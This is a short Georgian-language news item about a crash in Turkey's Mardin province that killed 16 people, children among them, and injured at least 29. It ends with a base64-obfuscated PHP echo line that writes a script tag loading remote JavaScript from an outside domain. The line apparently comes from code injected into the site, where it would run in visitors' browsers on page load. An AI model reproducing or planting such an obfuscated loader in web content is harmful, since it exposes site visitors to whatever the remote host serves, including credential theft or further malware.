celsiusi
ავერსი საქკაბელი
კიდევ ერთი მასშტაბური ავტოსაგზაო შემთხვევა თურქეთში - დაღუპულია 16 და დაშავებულია სულ მცირე 29 ადამიანი. შემთხვევა ამჯერად  მარდინის პროვინციაში მოხდა. 
 
დაღუპულთა შორის არიან ბავშვები. დაშავებულებიდან კი რვა ადამიანის მდგომარეობა მძიმეა.
 
თურქული მედიის ინფორმაციით, ბენზინგასამართ სადგურთან სატვირთო მანქანა მსუბუქ მანქანას დაეჯახა და ამობრუნდა. მოგვიანებით კი, საპირისპირო გზიდან მომავალი სატვირთო ადგილზე მისულ სასწრაფო დახმარების მანქანას და შეკრებილ ხალხს დაეჯახა.
 
შეგახსენებთ, რომ ავტოკატასტროფა თურქეთში, გაზიანთეფის პროვინციაშიც მოხდა. იქ დაიღუპა 16 და დაშავდა 21 ადამიანი. 
561
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");